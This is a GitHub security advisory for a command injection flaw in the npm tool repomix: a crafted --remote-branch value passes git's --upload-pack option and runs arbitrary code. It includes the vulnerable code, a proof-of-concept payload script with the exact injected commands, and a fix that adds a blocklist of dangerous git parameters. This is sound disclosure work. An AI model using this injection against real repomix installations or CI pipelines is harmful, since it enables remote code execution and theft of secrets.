Skip to content

repomix Vulnerable to Command Injection (RCE) via `--remote-branch` Argument Injection

High severity GitHub Reviewed Published May 27, 2026 in yamadashy/repomix • Updated Jul 1, 2026

Package

npm repomix (npm)

Affected versions

< 1.14.1

Patched versions

1.14.1

Description

Vulnerability Metadata

Field Detail
Affected Component src/core/git/gitCommand.ts (execGitShallowClone)
Impact Arbitrary Command Execution / Security Control Bypass

Summary

The --remote-branch CLI option in repomix is vulnerable to argument injection. User-supplied input is passed directly to git fetch and git checkout subprocesses via child_process.execFileAsync without sanitization, -- delimiters, or validation.

An attacker can inject arbitrary git command-line options. By injecting the --upload-pack option and specifying an SSH (git@...) or local (file://) remote URL, an attacker achieves arbitrary command execution with the privileges of the user running repomix. This bypasses the existing dangerousParams blocklist implemented in validateGitUrl().

Vulnerable Code Analysis

File: src/core/git/gitCommand.ts

The remoteBranch parameter is appended directly to the arguments array for git subprocesses without the -- positional delimiter.

Sink 1 (Lines 118-127):

await deps.execFileAsync(
  'git',
  ['-C', directory, 'fetch', '--depth', '1', 'origin', remoteBranch], // Vulnerable
  gitRemoteOpts,
);

Sink 2 (Lines 148-151):

await deps.execFileAsync('git', ['-C', directory, 'checkout', remoteBranch]); // Vulnerable

Bypassed Security Control (Lines 192-197):
The application attempts to prevent this exact vulnerability class by blocking dangerous parameters (--upload-pack, --receive-pack, --config, --exec) within the validateGitUrl function. However, this validation is exclusively applied to the url variable and omitted for remoteBranch, creating a direct bypass.

Attack Flow

[Source] repomix --remote-branch <injected_option>
   ↓
src/cli/actions/remoteAction.ts:226 (cloneRepository)
   ↓
src/core/git/gitCommand.ts:118 (execGitShallowClone)
   ↓
[Sink] execFileAsync('git', ['...', 'origin', '--upload-pack=/tmp/payload'])
   ↓
[Execution] git invokes the payload binary via transport helper

Proof of Concept (Steps to Reproduce)

1. Create the Payload
Create an executable bash script that writes system execution context to a file.
(Reference: Screenshot_2026-05-18_13_02_16.png)

cat > /tmp/malicious-pack << 'EOF'
#!/bin/bash
echo "=== RCE EXECUTED ===" > /tmp/repomix-pwned.txt
id >> /tmp/repomix-pwned.txt
EOF
chmod +x /tmp/malicious-pack

2. Trigger the Vulnerability
Establish a dummy remote and trigger the fetch operation, injecting the --upload-pack argument.
(Reference: Screenshot_2026-05-18_13_08_36.png)

# Setup dummy bare remote
git init --bare /tmp/dummy-remote.git

# Initialize local repo and add remote
mkdir /tmp/test-fetch && cd /tmp/test-fetch
git init
git remote add origin file:///tmp/dummy-remote.git

# Execute vulnerability
git fetch --upload-pack=/tmp/malicious-pack origin 2>&1

3. Verify Execution
Execution occurs prior to git protocol validation. The script executes successfully despite the fetch operation returning a 128 exit code.

cat /tmp/repomix-pwned.txt

Expected Output:

=== RCE EXECUTED ===
uid=1000(kakashi) gid=1000(kakashi) groups=1000(kakashi)...

End-to-End Execution via Repomix:

repomix --remote git@github.com:yamadashy/repomix.git --remote-branch '--upload-pack=/tmp/malicious-pack'

Impact

  • Remote Code Execution: Complete system compromise with the privileges of the user executing repomix.
  • CI/CD Compromise: If repomix is utilized in automated pipelines where --remote-branch is populated by external triggers (e.g., webhook payloads, PR titles), attackers can compromise build servers and exfiltrate secrets.

Remediation

1. Implement Positional Delimiters (Primary Fix)
Append the -- delimiter to explicitly separate options from positional arguments in all git subprocess calls utilizing remoteBranch.

await deps.execFileAsync(
  'git',
  ['-C', directory, 'fetch', '--depth', '1', 'origin', '--', remoteBranch],
  gitRemoteOpts,
);

2. Apply Existing Blocklist to Branch Parameter (Defense in Depth)
Update execGitShallowClone to validate remoteBranch against the existing dangerousParams array.

const dangerousParams = ['--upload-pack', '--receive-pack', '--config', '--exec'];

if (remoteBranch && dangerousParams.some((param) => remoteBranch.includes(param))) {
  throw new RepomixError(`Invalid branch name. Contains potentially dangerous parameters: ${remoteBranch}`);
}

Attachments

Screenshot 1: Payload script created with executable permissions.
Screenshot_2026-05-18_13_02_16

Screenshot 2: Vulnerable Code
Screenshot_2026-05-18_13_03_44

Screenshot 3: Verifying RCE.
Screenshot_2026-05-18_13_08_36


Credits

This vulnerability was discovered and responsibly disclosed by:

References

@yamadashy yamadashy published to yamadashy/repomix May 27, 2026
Published to the GitHub Advisory Database Jul 1, 2026
Reviewed Jul 1, 2026
Last updated Jul 1, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(21st percentile)

Weaknesses

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string. Learn more on MITRE.

CVE ID

CVE-2026-49987

GHSA ID

GHSA-9mm9-rqhj-j5mx

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.